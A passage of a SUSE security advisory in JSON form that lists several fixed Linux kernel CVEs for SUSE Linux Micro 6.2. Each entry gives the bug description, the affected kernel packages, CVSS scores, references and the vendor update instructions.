"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37744"
},
{
"cve": "CVE-2025-37751",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37751"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/cpu: Avoid running off the end of an AMD erratum table\n\nThe NULL array terminator at the end of erratum_1386_microcode was\nremoved during the switch from x86_cpu_desc to x86_cpu_id. This\ncauses readers to run off the end of the array.\n\nReplace the NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37751",
"url": "https://www.suse.com/security/cve/CVE-2025-37751"
},
{
"category": "external",
"summary": "SUSE Bug 1242505 for CVE-2025-37751",
"url": "https://bugzilla.suse.com/1242505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37751"
},
{
"cve": "CVE-2025-37841",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37841"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npm: cpupower: bench: Prevent NULL dereference on malloc failure\n\nIf malloc returns NULL due to low memory, \u0027config\u0027 pointer can be NULL.\nAdd a check to prevent NULL dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37841",
"url": "https://www.suse.com/security/cve/CVE-2025-37841"
},
{
"category": "external",
"summary": "SUSE Bug 1242974 for CVE-2025-37841",
"url": "https://bugzilla.suse.com/1242974"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37841"
},
{
"cve": "CVE-2025-37845",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37845"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: fprobe events: Fix possible UAF on modules\n\nCommit ac91052f0ae5 (\"tracing: tprobe-events: Fix leakage of module\nrefcount\") moved try_module_get() from __find_tracepoint_module_cb()\nto find_tracepoint() caller, but that introduced a possible UAF\nbecause the module can be unloaded before try_module_get(). In this\ncase, the module object should be freed too. Thus, try_module_get()\ndoes not only fail but may access to the freed object.\n\nTo avoid that, try_module_get() in __find_tracepoint_module_cb()\nagain.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37845",
"url": "https://www.suse.com/security/cve/CVE-2025-37845"
},
{
"category": "external",
"summary": "SUSE Bug 1242986 for CVE-2025-37845",
"url": "https://bugzilla.suse.com/1242986"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-37845"
},
{
"cve": "CVE-2025-37904",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37904"
}
],
"notes": [
{
"category": "general",
